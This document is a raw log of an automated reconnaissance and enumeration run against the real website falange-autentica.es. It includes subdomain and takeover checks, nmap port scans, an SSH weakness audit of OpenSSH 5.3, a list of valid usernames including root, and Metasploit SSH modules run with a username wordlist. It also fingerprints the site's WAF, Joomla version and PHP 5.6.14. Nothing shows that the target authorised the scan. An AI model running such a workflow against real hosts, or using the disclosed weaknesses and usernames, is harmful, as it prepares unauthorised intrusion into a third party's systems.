- [*] Forensics reports will be sent: mailto:admin@falange-autentica.es
- [-] Spoofing not possible for falange-autentica.es
- #######################################################################################################################################
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ discover v0.5.0 - by @michenriksen
- Identifying nameservers for falange-autentica.es... Done
- Using nameservers:
- - 213.251.188.150
- - 213.251.128.150
- Checking for wildcard DNS... Done
- Running collector: Threat Crowd... Done (0 hosts)
- Running collector: DNSDB... Error
- -> DNSDB returned unexpected response code: 503
- Running collector: Netcraft... Done (0 hosts)
- Running collector: PublicWWW... Done (0 hosts)
- Running collector: Censys... Skipped
- -> Key 'censys_secret' has not been set
- Running collector: Wayback Machine... Done (4 hosts)
- Running collector: PTRArchive... Error
- -> PTRArchive returned unexpected response code: 502
- Running collector: PassiveTotal... Skipped
- -> Key 'passivetotal_key' has not been set
- Running collector: Shodan... Skipped
- -> Key 'shodan' has not been set
- Running collector: Riddler... Skipped
- -> Key 'riddler_username' has not been set
- Running collector: VirusTotal... Skipped
- -> Key 'virustotal' has not been set
- Running collector: Dictionary... Done (0 hosts)
- Running collector: HackerTarget... Done (1 host)
- Running collector: Google Transparency Report... Done (1 host)
- Running collector: Certificate Search... Done (1 host)
- Resolving 4 unique hosts...
- 91.121.2.184 falange-autentica.es
- 91.121.2.184 mail.falange-autentica.es
- 91.121.2.184 www.falange-autentica.es
- Found subnets:
- - 91.121.2.0-255 : 3 hosts
- Wrote 3 hosts to:
- - file:///root/aquatone/falange-autentica.es/hosts.txt
- - file:///root/aquatone/falange-autentica.es/hosts.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ takeover v0.5.0 - by @michenriksen
- Loaded 3 hosts from /root/aquatone/falange-autentica.es/hosts.json
- Loaded 25 domain takeover detectors
- Identifying nameservers for falange-autentica.es... Done
- Using nameservers:
- - 213.251.188.150
- - 213.251.128.150
- Checking hosts for domain takeover vulnerabilities...
- Finished checking hosts:
- - Vulnerable : 0
- - Not Vulnerable : 3
- Wrote 0 potential subdomain takeovers to:
- - file:///root/aquatone/falange-autentica.es/takeovers.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ scan v0.5.0 - by @michenriksen
- Loaded 3 hosts from /root/aquatone/falange-autentica.es/hosts.json
- Probing 2 ports...
- 80/tcp 91.121.2.184 falange-autentica.es, mail.falange-autentica.es, www.falange-autentica.es
- 443/tcp 91.121.2.184 falange-autentica.es, mail.falange-autentica.es, www.falange-autentica.es
- Wrote open ports to file:///root/aquatone/falange-autentica.es/open_ports.txt
- Wrote URLs to file:///root/aquatone/falange-autentica.es/urls.txt
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ gather v0.5.0 - by @michenriksen
- Processing 6 pages...
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:17 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.11s latency).
- Not shown: 465 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- 389/tcp open ldap
- 443/tcp open https
- 465/tcp open smtps
- 993/tcp open imaps
- 7071/tcp open iwg1
- 8080/tcp open http-proxy
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:17 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.10s latency).
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- #######################################################################################################################################
- ftp is a valid user!
- mail is a valid user!
- mysql is a valid user!
- nobody is a valid user!
- postfix is a valid user!
- root is a valid user!
- #######################################################################################################################################
- libssh scanner 1.0.4
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:18 EST
- NSE: [ssh-run] Failed to specify credentials and command to run.
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- |_ gssapi-with-mic
- |_ssh-brute: Password authentication not allowed
- | ssh-hostkey:
- | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
- |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
- | ssh-publickey-acceptance:
- |_ Accepted Public Keys: No public keys accepted
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 - 3.1 (90%), Linux 3.11 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 8 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 104.09 ms 10.251.200.1
- 2 119.51 ms 185.94.189.129
- 3 ...
- 4 116.12 ms 94.23.122.146
- 5 ...
- 6 115.18 ms 91.121.131.219
- 7 ...
- 8 115.33 ms 91.121.2.184
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 53.09 seconds
- #######################################################################################################################################
- USER_FILE => /brutex/wordlists/simple-users.txt
- RHOSTS => falange-autentica.es
- RHOST => falange-autentica.es
- [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
- [*] falange-autentica.es:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
- [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
- [*] falange-autentica.es:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 closed... skipping.
- + -- --=[Port 67 opened... running tests...
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:19 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 67/udp open|filtered dhcps
- |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 106.02 ms 10.251.200.1
- 2 106.89 ms 185.94.189.129
- 3 ...
- 4 117.80 ms 94.23.122.146
- 5 ...
- 6 116.36 ms 91.121.131.219
- 7 ...
- 8 116.40 ms 91.121.2.184
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 139.59 seconds
- + -- --=[Port 68 opened... running tests...
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:22 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 103.13 ms 10.251.200.1
- 2 103.18 ms 185.94.189.129
- 3 ...
- 4 161.84 ms 94.23.122.146
- 5 ...
- 6 113.40 ms 91.121.131.219
- 7 ...
- 8 113.53 ms 91.121.2.184
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:24 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 69/udp open|filtered tftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 103.34 ms 10.251.200.1
- 2 106.55 ms 185.94.189.129
- 3 ...
- 4 114.77 ms 94.23.122.146
- 5 ...
- 6 113.85 ms 91.121.131.219
- 7 ...
- 8 113.89 ms 91.121.2.184
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://falange-autentica.es
- The site http://falange-autentica.es is behind a ModSecurity (OWASP CRS)
- Number of requests: 11
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://falange-autentica.es...
- ___________________________________________ SITE INFO ___________________________________________
- IP Title
- 91.121.2.184 Falange Auténtica
- ____________________________________________ VERSION ____________________________________________
- Name Versions Type
- Joomla! 3 | 3.3.1 | 3.3.1.rc | 3.3.2 | 3.3.2.rc | 3.3.3 | 3.3.4 CMS
- 3.3.5 | 3.3.6 | 3.4.0 | 3.4.0-alpha | 3.4.0-beta1
- 3.4.0-beta2 | 3.4.0-beta3 | 3.4.0-rc | 3.4.1 | 3.4.1-rc
- 3.4.1-rc2 | 3.4.2 | 3.4.2-rc | 3.4.3 | 3.4.4 | 3.4.4-rc
- 3.4.4-rc2 | 3.4.5 | 3.4.6 | 3.4.7 | 3.4.8 | 3.4.8-rc | 3.5.0
- 3.5.0-beta | 3.5.0-beta2 | 3.5.0-beta3 | 3.5.0-beta4
- 3.5.0-beta5 | 3.5.0-rc | 3.5.0-rc2 | 3.5.0-rc3 | 3.5.0-rc4
- 3.5.1 | 3.5.1-rc | 3.5.1-rc2 | 3.6.0 | 3.6.0-alpha
- 3.6.0-beta1 | 3.6.0-beta2 | 3.6.0-rc | 3.6.0-rc2 | 3.6.1
- 3.6.1-rc1 | 3.6.1-rc2 | 3.6.2 | 3.6.3-rc1
- Apache Platform
- PHP 5.6.14 Platform
- openSUSE tumbleweed OS
- __________________________________________ INTERESTING __________________________________________
- URL Note Type
- /robots.txt robots.txt index Interesting
- _____________________________________________ TOOLS _____________________________________________
- Name Link Software
- CMSmap https://github.com/Dionach/CMSmap Joomla!
- joomscan http://sourceforge.net/projects/joomscan/ Joomla!
- _________________________________________________________________________________________________
- Time: 53.5 sec Urls: 413 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Wed, 07 Nov 2018 22:28:27 GMT
- Server: Apache
- X-Powered-By: PHP/5.6.14
- Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=ck1qlfviu1d285h49t57no86j5; path=/; HttpOnly
- Expires: Wed, 17 Aug 2005 00:00:00 GMT
- Last-Modified: Wed, 07 Nov 2018 22:28:28 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Type: text/html; charset=utf-8
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [07-11-2018 17:29:07]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-falange-autentica.es.txt ]
- [ INFO ][ DORK ]::[ site:falange-autentica.es ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.by ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.nz ID: 010479943387663786936:wjwf2xkhfmq ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [07-11-2018 17:29:14]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-falange-autentica.es.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:29 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 123/udp open|filtered ntp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 106.48 ms 10.251.200.1
- 2 116.08 ms 185.94.189.129
- 3 ...
- 4 117.59 ms 94.23.122.146
- 5 ...
- 6 116.58 ms 91.121.131.219
- 7 ...
- 8 116.68 ms 91.121.2.184
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:31 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 161/tcp filtered snmp
- 161/udp open|filtered snmp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 103.86 ms 10.251.200.1
- 2 104.06 ms 185.94.189.129
- 3 ...
- 4 115.46 ms 94.23.122.146
- 5 ...
- 6 114.19 ms 91.121.131.219
- 7 ...
- 8 179.63 ms 91.121.2.184
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:34 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
- | ldap-rootdse:
- | LDAP Results
- | <ROOT>
- | namingContexts:
- | supportedControl: 1.3.6.1.4.1.4203.666.5.18
- | supportedControl: 1.3.6.1.4.1.4203.1.9.1.1
- | supportedControl: 1.3.6.1.4.1.21008.108.63.1
- | supportedControl: 2.16.840.1.113730.3.4.18
- | supportedControl: 2.16.840.1.113730.3.4.2
- | supportedControl: 1.3.6.1.4.1.4203.666.5.12
- | supportedControl: 1.3.6.1.4.1.4203.666.5.2
- | supportedControl: 1.3.6.1.4.1.4203.1.10.1
- | supportedControl: 1.2.840.113556.1.4.1340
- | supportedControl: 1.2.840.113556.1.4.805
- | supportedControl: 1.2.840.113556.1.4.1413
- | supportedControl: 1.3.6.1.4.1.4203.666.5.15
- | supportedControl: 1.2.840.113556.1.4.1339
- | supportedControl: 1.2.840.113556.1.4.319
- | supportedControl: 1.2.826.0.1.3344810.2.3
- | supportedControl: 1.3.6.1.1.13.2
- | supportedControl: 1.3.6.1.1.13.1
- | supportedControl: 1.3.6.1.1.12
- | supportedExtension: 1.3.6.1.4.1.1466.20037
- | supportedExtension: 1.3.6.1.4.1.4203.1.11.1
- | supportedExtension: 1.3.6.1.4.1.4203.1.11.3
- | supportedExtension: 1.3.6.1.1.8
- | supportedLDAPVersion: 3
- | supportedSASLMechanisms: SCRAM-SHA-1
- | supportedSASLMechanisms: GSSAPI
- | supportedSASLMechanisms: DIGEST-MD5
- | supportedSASLMechanisms: OTP
- | supportedSASLMechanisms: CRAM-MD5
- |_ subschemaSubentry: cn=Subschema
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 (92%), Linux 3.4 - 3.10 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 (90%), Linux 3.11 (90%), Linux 3.5 (90%), Synology DiskStation Manager 5.2-5644 (90%), Crestron XPanel control system (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 8 hops
- TRACEROUTE (using port 389/tcp)
- HOP RTT ADDRESS
- 1 103.68 ms 10.251.200.1
- 2 103.73 ms 185.94.189.129
- 3 ...
- 4 171.68 ms 94.23.122.146
- 5 ...
- 6 114.25 ms 94.23.122.73
- 7 ...
- 8 113.66 ms 91.121.2.184
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://falange-autentica.es
- The site https://falange-autentica.es is behind a ModSecurity (OWASP CRS)
- Number of requests: 11
- #######################################################################################################################################
- https://falange-autentica.es [200 OK] Apache, Cookies[2b5581ae182de78f0daf6795785a3ed8], Country[FRANCE][FR], Email[contactar@falange-autentica.es], Frame, HTML5, HTTPServer[Apache], HttpOnly[2b5581ae182de78f0daf6795785a3ed8], IP[91.121.2.184], MetaGenerator[Joomla! - Open Source Content Management], OpenSearch[https://falange-autentica.es/component/search/?Itemid=101&format=opensearch], PHP[5.6.14], Script[application/json,text/javascript], Title[Falange Auténtica], X-Powered-By[PHP/5.6.14], YouTube
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning https://falange-autentica.es...
- ___________________________________________ SITE INFO ___________________________________________
- IP Title
- 91.121.2.184 Falange Auténtica
- ____________________________________________ VERSION ____________________________________________
- Name Versions Type
- Joomla! 3 | 3.3.1 | 3.3.1.rc | 3.3.2 | 3.3.2.rc | 3.3.3 | 3.3.4 CMS
- 3.3.5 | 3.3.6 | 3.4.0 | 3.4.0-alpha | 3.4.0-beta1
- 3.4.0-beta2 | 3.4.0-beta3 | 3.4.0-rc | 3.4.1 | 3.4.1-rc
- 3.4.1-rc2 | 3.4.2 | 3.4.2-rc | 3.4.3 | 3.4.4 | 3.4.4-rc
- 3.4.4-rc2 | 3.4.5 | 3.4.6 | 3.4.7 | 3.4.8 | 3.4.8-rc | 3.5.0
- 3.5.0-beta | 3.5.0-beta2 | 3.5.0-beta3 | 3.5.0-beta4
- 3.5.0-beta5 | 3.5.0-rc | 3.5.0-rc2 | 3.5.0-rc3 | 3.5.0-rc4
- 3.5.1 | 3.5.1-rc | 3.5.1-rc2 | 3.6.0 | 3.6.0-alpha
- 3.6.0-beta1 | 3.6.0-beta2 | 3.6.0-rc | 3.6.0-rc2 | 3.6.1
- 3.6.1-rc1 | 3.6.1-rc2 | 3.6.2 | 3.6.3-rc1
- Apache Platform
- PHP 5.6.14 Platform
- openSUSE tumbleweed OS
- __________________________________________ INTERESTING __________________________________________
- URL Note Type
- /robots.txt robots.txt index Interesting
- _____________________________________________ TOOLS _____________________________________________
- Name Link Software
- CMSmap https://github.com/Dionach/CMSmap Joomla!
- joomscan http://sourceforge.net/projects/joomscan/ Joomla!
- _________________________________________________________________________________________________
- Time: 75.5 sec Urls: 431 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Wed, 07 Nov 2018 22:37:24 GMT
- Server: Apache
- X-Powered-By: PHP/5.6.14
- Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=3qo5damo2no5e2i033rrjhmpq7; path=/; HttpOnly
- Expires: Wed, 17 Aug 2005 00:00:00 GMT
- Last-Modified: Wed, 07 Nov 2018 22:37:25 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Type: text/html; charset=utf-8
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginHeartbleed
- PluginHSTS
- PluginCompression
- PluginSessionRenegotiation
- PluginChromeSha1Deprecation
- PluginOpenSSLCipherSuites
- PluginSessionResumption
- PluginCertInfo
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- falange-autentica.es:443 => 91.121.2.184:443
- SCAN RESULTS FOR FALANGE-AUTENTICA.ES:443 - 91.121.2.184:443
- ------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 4b82cef8595e0e573a3568c86ce18df4a0cfb877
- Common Name: falange-autentica.es
- Issuer: Let's Encrypt Authority X3
- Serial Number: 03B467C49D12782AA2B693ECFF0B1C9EC555
- Not Before: Oct 2 06:11:20 2018 GMT
